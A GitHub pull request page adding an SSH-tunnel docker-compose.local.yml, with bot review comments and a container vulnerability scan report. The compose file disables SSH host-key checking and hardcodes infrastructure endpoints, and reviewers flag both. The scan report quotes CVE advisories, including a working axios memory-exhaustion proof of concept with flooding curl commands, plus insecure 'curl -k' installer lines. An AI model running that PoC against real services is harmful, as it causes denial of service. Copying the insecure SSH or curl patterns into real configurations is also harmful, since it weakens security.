Skip to content

Conversation

@anatolyshipitz
Copy link
Collaborator

@anatolyshipitz anatolyshipitz commented Oct 23, 2025

  • Introduced a new docker-compose.local.yml file for local development, enabling SSH tunneling for Redmine and MongoDB services.
  • Updated README.md to include instructions for using the new local development configuration, clarifying the usage of different docker-compose files for various environments.

These changes enhance the development workflow by providing a dedicated configuration for local setups.

Summary by CodeRabbit

  • New Features

    • Added a local docker-compose override to support SSH tunnels to remote services and host mappings for local workers.
  • Documentation

    • Reorganized and clarified local development setup with clearer section labels and workflow distinctions.
    • Added guidance for using a local docker-compose override and notes on local data persistence.
    • Improved troubleshooting and service health check guidance with clearer formatting.
    • Expanded GitHub MCP configuration steps with explicit setup and examples.
  • Tests

    • Stabilized timer-related tests by enabling controlled timer setup and teardown.

@coderabbitai
Copy link

coderabbitai bot commented Oct 23, 2025

Walkthrough

Adds a new docker-compose.local.yml with SSH-tunnel helper services and a local Temporal worker, updates README with Local Development instructions and GitHub MCP token/secret steps, and modifies a worker test to use fake timers and cleanup.

Changes

Cohort / File(s) Change Summary
Documentation
README.md
Renamed and reordered sections (e.g., "Development" → "Local Development"), added explicit instructions to run docker-compose.local.yml with -f, separated local vs default development flows, updated production command syntax, expanded persistence and health-check examples, improved troubleshooting/logging formatting, and added GitHub MCP secret/token creation/editing steps.
Local compose override
docker-compose.local.yml
New compose override adding redmine-tunnel and mongo-tunnel (Alpine containers installing ssh and opening SSH tunnels using mounted ~/.ssh and SSH_KEY env), and temporal-worker-main configured with .env and extra_hosts mappings to host-gateway for Mongo instances on the app-network.
Tests
workers/main/src/index.test.ts
Test harness updated to enable fake timers in beforeEach (vi.useFakeTimers()), and to clear timers and restore real timers in afterEach (vi.clearAllTimers(), vi.useRealTimers()).

Sequence Diagram(s)

sequenceDiagram
  autonumber
  participant Dev as Developer
  participant Compose as docker compose (-f ...)
  participant Redmine as redmine-tunnel
  participant Mongo as mongo-tunnel
  participant Worker as temporal-worker-main
  participant Remote as Remote DBs

  Dev->>Compose: docker compose -f docker-compose.yml -f docker-compose.local.yml up
  Compose->>Redmine: create/start container (Alpine + ssh)
  Compose->>Mongo: create/start container (Alpine + ssh)
  Compose->>Worker: create/start temporal worker (env_file + extra_hosts)
  Redmine->>Remote: ssh tunnel local:3306 -> remote MySQL
  Mongo->>Remote: ssh tunnel local:31000 -> remote Mongo
  Worker->>Mongo: connect via forwarded host-gateway ports
  Note right of Worker: uses forwarded ports to reach remote services
Loading

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~10 minutes

Areas to check:

  • SSH tunnel command correctness and security (mounted keys, env var SSH_KEY) in docker-compose.local.yml.
  • extra_hosts mapping correctness for temporal-worker-main.
  • Test timer usage and proper cleanup in workers/main/src/index.test.ts.

Possibly related PRs

Suggested reviewers

  • killev
  • sadmoondog

Poem

🐇
I tunneled through keys and midnight air,
So containers speak with distant care.
Compose brings life, the worker hums,
Local hops begin — hooray, here it comes! 🥕

Pre-merge checks and finishing touches

❌ Failed checks (1 warning)
Check name Status Explanation Resolution
Docstring Coverage ⚠️ Warning Docstring coverage is 0.00% which is insufficient. The required threshold is 80.00%. You can run @coderabbitai generate docstrings to improve docstring coverage.
✅ Passed checks (2 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Title Check ✅ Passed The pull request title "Add local development configuration with docker-compose.local.yml" directly aligns with the primary change in this PR, which is the introduction of a new docker-compose.local.yml file that provides SSH tunneling configuration for local development. The title is specific and clear enough that a reviewer scanning the repository history would immediately understand the core purpose of the change. While the PR also includes README updates explaining how to use the new configuration and a minor test file modification, the title appropriately captures the main focus of the changeset as described in the PR objectives.
✨ Finishing touches
  • 📝 Generate docstrings
🧪 Generate unit tests (beta)
  • Create PR with unit tests
  • Post copyable unit tests in a comment
  • Commit unit tests in branch chore/docker-compose-local-explicit

📜 Recent review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between f629b57 and 8b253f4.

📒 Files selected for processing (3)
  • README.md (7 hunks)
  • docker-compose.local.yml (1 hunks)
  • workers/main/src/index.test.ts (2 hunks)
✅ Files skipped from review due to trivial changes (1)
  • docker-compose.local.yml
🚧 Files skipped from review as they are similar to previous changes (2)
  • workers/main/src/index.test.ts
  • README.md
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

Copy link

@coderabbitai coderabbitai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 3

🧹 Nitpick comments (1)
README.md (1)

195-200: Expand troubleshooting for local development SSH tunnels.

The Troubleshooting section (lines 195-200) covers container logs and port availability but misses guidance for SSH tunnel issues specific to local development:

  • Connection refused on port 3306/31000
  • Host key verification errors
  • SSH key permission issues
  • Authentication failures

Consider adding:

**SSH Tunnel Issues (local development):**

- Verify SSH key permissions: `chmod 600 ~/.ssh/id_rsa`
- Test SSH connection manually: `ssh -i ~/.ssh/id_rsa ubuntu@your_host`
- Check tunnel logs: `docker logs redmine-tunnel` or `docker logs mongo-tunnel`
- Verify port forwarding: `netstat -an | grep 3306` (Linux) or `netstat -an | grep 31000` (macOS)
📜 Review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 0dc0722 and 9345894.

📒 Files selected for processing (2)
  • README.md (7 hunks)
  • docker-compose.local.yml (1 hunks)
🧰 Additional context used
🧠 Learnings (6)
📚 Learning: 2025-07-28T16:44:50.073Z
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/project-structure.mdc:0-0
Timestamp: 2025-07-28T16:44:50.073Z
Learning: The project architecture must include interconnected services: n8n, Temporal Server, Temporal UI, PostgreSQL, and OpenSearch, each running on their specified ports.

Applied to files:

  • README.md
📚 Learning: 2025-06-24T12:29:29.869Z
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/service-configuration.mdc:0-0
Timestamp: 2025-06-24T12:29:29.869Z
Learning: Health verification scripts (such as scripts/check_services.sh) should check the accessibility of all critical service endpoints (HTTP, gRPC, database ports) to ensure the stack is running as expected.

Applied to files:

  • README.md
📚 Learning: 2025-07-28T16:44:24.081Z
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/docker-configuration.mdc:0-0
Timestamp: 2025-07-28T16:44:24.081Z
Learning: Applies to volumes/**/* : All service data must be persisted in Docker volumes mapped to the local volumes/ directory, such as ./volumes/n8n_data, ./volumes/opensearch-data, and ./volumes/postgresql-data

Applied to files:

  • README.md
📚 Learning: 2025-07-28T16:44:24.081Z
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/docker-configuration.mdc:0-0
Timestamp: 2025-07-28T16:44:24.081Z
Learning: Applies to docker-compose.yml : Services must communicate over an internal Docker network with only the specified ports exposed: n8n (5678), Temporal (7233), Temporal UI (8080), PostgreSQL (5432), and OpenSearch (9200)

Applied to files:

  • README.md
📚 Learning: 2025-07-28T16:44:24.081Z
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/docker-configuration.mdc:0-0
Timestamp: 2025-07-28T16:44:24.081Z
Learning: Applies to docker-compose.yml : All service configurations, including service dependencies, volume mounts, network configuration, environment variables, and port mappings, must be defined in docker-compose.yml

Applied to files:

  • README.md
📚 Learning: 2025-06-24T12:29:29.869Z
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/service-configuration.mdc:0-0
Timestamp: 2025-06-24T12:29:29.869Z
Learning: Troubleshooting containerized services should include checking container logs, verifying port availability, ensuring sufficient Docker resources, rerunning setup scripts for volume issues, and checking service health endpoints.

Applied to files:

  • README.md
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check
🔇 Additional comments (3)
docker-compose.local.yml (1)

32-38: Verify temporal-worker-main configuration and .env dependency.

The temporal-worker-main service relies on an .env file but has minimal inline configuration shown. Ensure:

  1. The .env file exists and contains required environment variables for this service
  2. The extra_hosts mapping to host-gateway is intentional for DNS resolution of MongoDB replicas from within the container
  3. Confirm this service is compatible with the SSH tunnels defined above (port mappings align)

Consider documenting the expected .env variables in a .env.local.example file.

README.md (2)

59-77: Clear local development documentation added.

Lines 59-77 properly document the three deployment scenarios (Local Development, Development, Production) with correct docker-compose command syntax. The explicit mention of the -f flag and the need to specify docker-compose.local.yml is helpful.


172-181: Review comment is architecturally inaccurate relative to actual implementation.

The review identifies a valid gap—SSH tunnel setup for local development is undocumented in README.md—but proposes environment variables (REDMINE_SSH_USER, REDMINE_SSH_HOST, REDMINE_DB_HOST, REDMINE_FORWARD_HOST) and .env.local configuration that do not exist in the actual docker-compose.local.yml.

The actual docker-compose.local.yml contains hardcoded SSH hosts in command strings:

  • redmine-tunnel: ssh -i /root/.ssh/id_rsa ubuntu@staging.forecasting-v2.gluzdov.com (hardcoded)
  • mongo-tunnel: ssh -i /root/.ssh/id_rsa ubuntu@forecasting-v2.gluzdov.com (hardcoded)

The SSH_KEY environment variable is set but unused dynamically in the current implementation.

What actually needs documentation (lines 59-61, "Local Development" section):

  • SSH key setup requirement (~/.ssh/id_rsa)
  • What tunnel services do (forward remote database ports)
  • SSH troubleshooting guidance

The review suggests adding .env.local parametrization that would require refactoring the docker-compose.local.yml itself—this is beyond documentation and mischaracterizes the current setup.

Likely an incorrect or invalid review comment.

Comment on lines +2 to +15
redmine-tunnel:
container_name: redmine-tunnel
image: alpine:latest
command: >
sh -c "apk add --no-cache openssh &&
ssh -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa ubuntu@staging.forecasting-v2.gluzdov.com -N -L 0.0.0.0:3306:redmine-pr-rds-db-read.c1kaki1qbk4o.us-east-1.rds.amazonaws.com:3306 -L 0.0.0.0:31000:10.4.3.184:31000"
volumes:
- ~/.ssh:/root/.ssh:ro
ports:
- '3306:3306'
networks:
- app-network
environment:
- SSH_KEY=/root/.ssh/id_rsa
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

Critical: Hardcoded infrastructure endpoints and credentials exposed.

Lines 7 and throughout the redmine-tunnel service expose sensitive infrastructure details that must never be committed:

  • Hardcoded staging hostname: ubuntu@staging.forecasting-v2.gluzdov.com
  • Hardcoded AWS RDS endpoint: redmine-pr-rds-db-read.c1kaki1qbk4o.us-east-1.rds.amazonaws.com
  • Hardcoded internal IP: 10.4.3.184:31000

These represent production/staging infrastructure and should be externalized to environment variables or a .env.local file that is excluded from version control.

Refactor to use environment variable substitution:

 services:
   redmine-tunnel:
     container_name: redmine-tunnel
     image: alpine:latest
     command: >
       sh -c "apk add --no-cache openssh && 
-             ssh -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa ubuntu@staging.forecasting-v2.gluzdov.com -N -L 0.0.0.0:3306:redmine-pr-rds-db-read.c1kaki1qbk4o.us-east-1.rds.amazonaws.com:3306 -L 0.0.0.0:31000:10.4.3.184:31000"
+             ssh -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa ${REDMINE_SSH_USER}@${REDMINE_SSH_HOST} -N -L 0.0.0.0:3306:${REDMINE_DB_HOST}:3306 -L 0.0.0.0:31000:${REDMINE_FORWARD_HOST}:31000"

Ensure .env.local is added to .gitignore and create a .env.local.example template with placeholder values.

🤖 Prompt for AI Agents
In docker-compose.local.yml around lines 2 to 15 the redmine-tunnel service
contains hardcoded sensitive endpoints (staging SSH host, RDS endpoint and
internal IP/port); replace those literal values with environment-variable
placeholders (e.g. ${SSH_REMOTE_USER}@${SSH_REMOTE_HOST}, ${RDS_HOST},
${INTERNAL_IP}:${INTERNAL_PORT}) and reference them via docker-compose variable
substitution, ensure the SSH key path is configurable (e.g. ${SSH_KEY_PATH})
rather than hardcoded, and update the compose file to read from a .env.local
file; add .env.local to .gitignore and create a .env.local.example with
placeholder values for all new variables so no secrets are committed.

Comment on lines +6 to +15
sh -c "apk add --no-cache openssh &&
ssh -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa ubuntu@staging.forecasting-v2.gluzdov.com -N -L 0.0.0.0:3306:redmine-pr-rds-db-read.c1kaki1qbk4o.us-east-1.rds.amazonaws.com:3306 -L 0.0.0.0:31000:10.4.3.184:31000"
volumes:
- ~/.ssh:/root/.ssh:ro
ports:
- '3306:3306'
networks:
- app-network
environment:
- SSH_KEY=/root/.ssh/id_rsa
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

Major: SSH security misconfigurations and unused environment variable.

Multiple SSH-related issues:

  1. Line 6: StrictHostKeyChecking=no disables host key verification, bypassing critical SSH security. This should only be used with extreme caution and be justified in comments.

  2. Line 15: SSH_KEY environment variable is defined but never used in the actual SSH command (line 7). The command hardcodes /root/.ssh/id_rsa instead. This inconsistency suggests incomplete refactoring or dead code.

  3. Line 7: SSH key path is hardcoded to /root/.ssh/id_rsa, assuming this specific filename. Consider using the SSH_KEY env var consistently or making it configurable.

Apply this diff to fix the inconsistency:

   redmine-tunnel:
     container_name: redmine-tunnel
     image: alpine:latest
     command: >
       sh -c "apk add --no-cache openssh && 
-             ssh -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa ubuntu@staging.forecasting-v2.gluzdov.com -N -L 0.0.0.0:3306:redmine-pr-rds-db-read.c1kaki1qbk4o.us-east-1.rds.amazonaws.com:3306 -L 0.0.0.0:31000:10.4.3.184:31000"
+             ssh -o StrictHostKeyChecking=accept-new -i ${SSH_KEY} ${REDMINE_SSH_USER}@${REDMINE_SSH_HOST} -N -L 0.0.0.0:3306:${REDMINE_DB_HOST}:3306 -L 0.0.0.0:31000:${REDMINE_FORWARD_HOST}:31000"
     volumes:
       - ~/.ssh:/root/.ssh:ro
     ports:
       - '3306:3306'
     networks:
       - app-network
     environment:
       - SSH_KEY=/root/.ssh/id_rsa

Consider StrictHostKeyChecking=accept-new as a safer alternative to no, which accepts new keys but still validates known hosts.

Committable suggestion skipped: line range outside the PR's diff.

🤖 Prompt for AI Agents
In docker-compose.local.yml around lines 6 to 15, the SSH command disables
host-key verification and hardcodes the private key path while the SSH_KEY env
var is unused; replace StrictHostKeyChecking=no with
StrictHostKeyChecking=accept-new (or add a brief comment if no change is
allowed), remove the hardcoded /root/.ssh/id_rsa in the ssh command and
reference the SSH_KEY environment variable instead (or remove SSH_KEY if you
prefer a fixed path), and ensure the mounted volume and permissions match the
chosen key path; keep the SSH_KEY env var consistent with the command or delete
it to avoid dead configuration.

Comment on lines +17 to +30
mongo-tunnel:
container_name: mongo-tunnel
image: alpine:latest
command: >
sh -c "apk add --no-cache openssh &&
ssh -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa ubuntu@forecasting-v2.gluzdov.com -N -L 0.0.0.0:31000:10.4.3.184:31000"
volumes:
- ~/.ssh:/root/.ssh:ro
ports:
- '31000:31000'
networks:
- app-network
environment:
- SSH_KEY=/root/.ssh/id_rsa
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

Critical & Major: Hardcoded infrastructure endpoints and SSH misconfigurations (same as redmine-tunnel).

The mongo-tunnel service contains identical issues:

  • Line 22: Hardcoded hostname ubuntu@forecasting-v2.gluzdov.com and internal IP 10.4.3.184
  • Line 22: StrictHostKeyChecking=no disables host key verification
  • Line 30: SSH_KEY env var defined but unused; command hardcodes /root/.ssh/id_rsa

Apply the same refactoring as redmine-tunnel to externalize sensitive data and fix SSH security configuration.

🤖 Prompt for AI Agents
In docker-compose.local.yml around lines 17 to 30, the mongo-tunnel service
hardcodes the remote user/host and internal IP, disables host key verification,
and declares SSH_KEY env var but never uses it; replace the hardcoded values
with environment variables (e.g. MONGO_SSH_USER, MONGO_SSH_HOST,
MONGO_TARGET_HOST, MONGO_TARGET_PORT) and use the declared SSH_KEY variable as
the identity file path in the ssh command instead of a hardcoded path; remove
StrictHostKeyChecking=no and ensure host verification by either mounting a
known_hosts file or running ssh-keyscan at container startup to populate
/root/.ssh/known_hosts; ensure the private key is mounted read-only from the
host and referenced via the SSH_KEY env var so no secrets are baked into the
image or compose file.

@github-actions
Copy link

github-actions bot commented Oct 23, 2025

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference n8n-test:latest
digestsha256:bec1e62deecd352f51c7319cb7773ec3d870fb42eff383635b3b2ecf80221ff2
vulnerabilitiescritical: 2 high: 14 medium: 0 low: 0
platformlinux/amd64
size335 MB
packages1844
📦 Base Image node:22-alpine
also known as
  • 22-alpine3.22
  • 22.19-alpine
  • 22.19-alpine3.22
  • 22.19.0-alpine
  • 22.19.0-alpine3.22
  • jod-alpine
  • jod-alpine3.22
  • lts-alpine
  • lts-alpine3.22
digestsha256:704b199e36b5c1bc505da773f742299dc1ee5a4c70b86d1eb406c334f63253c6
vulnerabilitiescritical: 0 high: 1 medium: 2 low: 2
critical: 2 high: 2 medium: 0 low: 0 libxml2 2.13.8-r0 (apk)

pkg:apk/alpine/libxml2@2.13.8-r0?os_name=alpine&os_version=3.22

critical : CVE--2025--49796

Affected range<2.13.9-r0
Fixed version2.13.9-r0
EPSS Score0.438%
EPSS Percentile62nd percentile
Description

critical : CVE--2025--49794

Affected range<2.13.9-r0
Fixed version2.13.9-r0
EPSS Score0.251%
EPSS Percentile48th percentile
Description

high : CVE--2025--6021

Affected range<2.13.9-r0
Fixed version2.13.9-r0
EPSS Score0.546%
EPSS Percentile67th percentile
Description

high : CVE--2025--49795

Affected range<2.13.9-r0
Fixed version2.13.9-r0
EPSS Score0.141%
EPSS Percentile35th percentile
Description
critical: 0 high: 2 medium: 0 low: 0 xlsx 0.20.2 (npm)

pkg:npm/xlsx@0.20.2

high 7.8: CVE--2023--30533 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Affected range>=0
Fixed versionNot Fixed
CVSS Score7.8
CVSS VectorCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score4.328%
EPSS Percentile88th percentile
Description

All versions of SheetJS CE through 0.19.2 are vulnerable to "Prototype Pollution" when reading specially crafted files. Workflows that do not read arbitrary files (for example, exporting data to spreadsheet files) are unaffected.

A non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package xlsx are no longer maintained. Version 0.19.3 can be downloaded via https://cdn.sheetjs.com/.

high 7.5: CVE--2024--22363 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Affected range>=0
Fixed versionNot Fixed
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.079%
EPSS Percentile24th percentile
Description

SheetJS Community Edition before 0.20.2 is vulnerable.to Regular Expression Denial of Service (ReDoS).

A non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package xlsx are no longer maintained. Version 0.20.2 can be downloaded via https://cdn.sheetjs.com/.

critical: 0 high: 1 medium: 0 low: 0 n8n-nodes-base 1.107.0 (npm)

pkg:npm/n8n-nodes-base@1.107.0

high 8.8: GHSA--365g--vjw2--grx8 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Affected range<=1.113.0
Fixed versionNot Fixed
CVSS Score8.8
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description

Impact

The Execute Command node in n8n allows execution of arbitrary commands on the host system where n8n runs. While this functionality is intended for advanced automation and can be useful in certain workflows, it poses a security risk if all users with access to the n8n instance are not fully trusted.

An attacker—either a malicious user or someone who has compromised a legitimate user account—could exploit this node to run arbitrary commands on the host machine, potentially leading to data exfiltration, service disruption, or full system compromise.

This vulnerability affects all n8n deployments where:

  • The Execute Command node is enabled, and
  • Not all user accounts are strictly controlled and trusted.

n8n.cloud is not impacted.

Patches

No code changes have been made to alter the behavior of the Execute Command node. The recommended mitigation is to disable the node by default in environments where it is not explicitly required.

Future n8n versions may change the default availability of this node.

Workarounds

Administrators can disable the Execute Command node by setting the following environment variable before starting n8n:

export NODES_EXCLUDE: "[\"n8n-nodes-base.executeCommand\"]"

References

n8n docs: Execute Command
n8n docs: Blocking nodes

critical: 0 high: 1 medium: 0 low: 0 curl 8.14.1-r1 (apk)

pkg:apk/alpine/curl@8.14.1-r1?os_name=alpine&os_version=3.22

high : CVE--2025--9086

Affected range<8.14.1-r2
Fixed version8.14.1-r2
EPSS Score0.077%
EPSS Percentile24th percentile
Description
critical: 0 high: 1 medium: 0 low: 0 axios 1.11.0 (npm)

pkg:npm/axios@1.11.0

high 7.5: CVE--2025--58754 Allocation of Resources Without Limits or Throttling

Affected range>=1.0.0
<1.12.0
Fixed version1.12.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.025%
EPSS Percentile5th percentile
Description

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength , maxBodyLength and decodes into memory on Node before streaming enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send 3 post requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.

critical: 0 high: 1 medium: 0 low: 0 playwright 1.54.2 (npm)

pkg:npm/playwright@1.54.2

high 8.7: CVE--2025--59288 Improper Verification of Cryptographic Signature

Affected range<1.55.1
Fixed version1.55.1
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
EPSS Score0.027%
EPSS Percentile6th percentile
Description

Summary

Use of curl with the -k (or --insecure) flag in installer scripts allows attackers to deliver arbitrary executables via Man-in-the-Middle (MitM) attacks. This can lead to full system compromise, as the downloaded files are installed as privileged applications.

Details

The following scripts in the microsoft/playwright repository at commit bee11cbc28f24bd18e726163d0b9b1571b4f26a8 use curl -k to fetch and install executable packages without verifying the authenticity of the SSL certificate:

In each case, the shell scripts download a browser installer package using curl -k and immediately install it:

curl --retry 3 -o ./<pkg-file> -k <url>
sudo installer -pkg /tmp/<pkg-file> -target /

Disabling SSL verification (-k) means the download can be intercepted and replaced with malicious content.

PoC

A high-level exploitation scenario:

  1. An attacker performs a MitM attack on a network where the victim runs one of these scripts.
  2. The attacker intercepts the HTTPS request and serves a malicious package (for example, a trojaned browser installer).
  3. Because curl -k is used, the script downloads and installs the attacker's payload without any certificate validation.
  4. The attacker's code is executed with system privileges, leading to full compromise.

No special configuration is needed: simply running these scripts on any untrusted or hostile network is enough.

Impact

This is a critical Remote Code Execution (RCE) vulnerability due to improper SSL certificate validation (CWE-295: Improper Certificate Validation). Any user or automation running these scripts is at risk of arbitrary code execution as root/admin, system compromise, data theft, or persistent malware installation. The risk is especially severe because browser packages are installed with elevated privileges and the scripts may be used in CI/CD or developer environments.

Fix

Credit

  • This vulnerability was uncovered by tooling by Socket
  • This vulnerability was confirmed by @evilpacket
  • This vulnerability was reported by @JLLeitschuh at Socket

Disclosure

critical: 0 high: 1 medium: 0 low: 0 openssh 10.0_p1-r7 (apk)

pkg:apk/alpine/openssh@10.0_p1-r7?os_name=alpine&os_version=3.22

high : CVE--2023--51767

